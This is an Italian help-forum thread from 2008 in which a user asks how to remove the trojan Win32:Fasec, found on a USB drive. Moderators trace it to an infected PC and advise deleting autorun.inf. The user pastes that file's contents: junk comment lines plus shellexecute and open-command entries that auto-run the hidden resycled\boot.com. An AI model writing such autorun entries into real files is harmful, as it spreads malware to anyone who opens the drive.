<< Discussione precedente | Discussione successiva >> |
[Spostato] Cavallo di troia win32: Fasec |
Autore | Messaggio |
volk |
| ||
Utente registrato #15897 Registrato il: ven 19 dic 2008 - 15:49Messaggi: 3 | Un saluto e un augurio di buone feste a tutti. Avrei preferito presentarmi in un altro modo ma aimè ho da segnalare un problema. Avast! mi segnala il cavallo di troia in oggetto sulla pen drive dove ho installato l'ultima versione del winpenpak launcher personal. Come faccio per eliminarlo?. Grazie. [ Modificato lun 29 dic 2008 - 20:10 ] | ||
Torna ad inizio pagina |
Danix |
| ||
Utente registrato #1 Registrato il: ven 29 dic 2006 - 05:38Provenienza: Sassari Messaggi: 12960 | Benvenuto su winPenPack Su quale software (o su quale file) viene segnalato? | ||
Torna ad inizio pagina |
volk |
| ||
Utente registrato #15897 Registrato il: ven 19 dic 2008 - 15:49Messaggi: 3 | Ecco il percorso del nome del file G:\resycled\boot.com | ||
Torna ad inizio pagina |
Danix |
| ||
Utente registrato #1 Registrato il: ven 29 dic 2006 - 05:38Provenienza: Sassari Messaggi: 12960 | Non credo proprio che quel file abbia a che fare con winPenPack, ma piuttosto (o probabilmente) col tuo pc -Link- Cancella il file autorun.inf che trovi nella root della pendrive. (abilita la visualizzazione di cartelle e file nascosti da "Opzioni cartella" di Windows) [ Modificato lun 29 dic 2008 - 20:20 ] | ||
Torna ad inizio pagina |
grangas |
| ||
Utente registrato #4479 Registrato il: mar 01 mag 2007 - 23:51Provenienza: Saludecio (RN) Messaggi: 445 | Ciao Volk Il tuo virus, o presunto tale, sembra essere nel cestino della tua pen drive e non all'interno del wPP. Quel file potrebbe essere arivato tramite altri file/programmi oppure anche solo per aver collegato la penna ad un pc infetto | ||
Torna ad inizio pagina |
volk |
| ||
Utente registrato #15897 Registrato il: ven 19 dic 2008 - 15:49Messaggi: 3 | Il file autorun.ini creato è [autorun] ;fpenloxyilvgwjkqocabtepyvhsijwkutvfdkqufusmetcunymfwlkrauznsqkfzdnazpqbuqhqilybymcoxdfuixfrwodzvbtztfilq shellexecute="resycled\boot.com g:" ;hsjfebduvwuyrxssgwhxpkcsarbjkryolqdnhelzbengxfbvp shell\Open\command="resycled\boot.com g:" ;jrkb E' sicuramente è il mio pc è infetto. Cercero di rimediare. Grazie [ Modificato lun 29 dic 2008 - 20:26 ] | ||
Torna ad inizio pagina |
Moderatori: Danix, Taf, Rcs, Energy, zandet2, ZioZione, Admin, LordJim60 |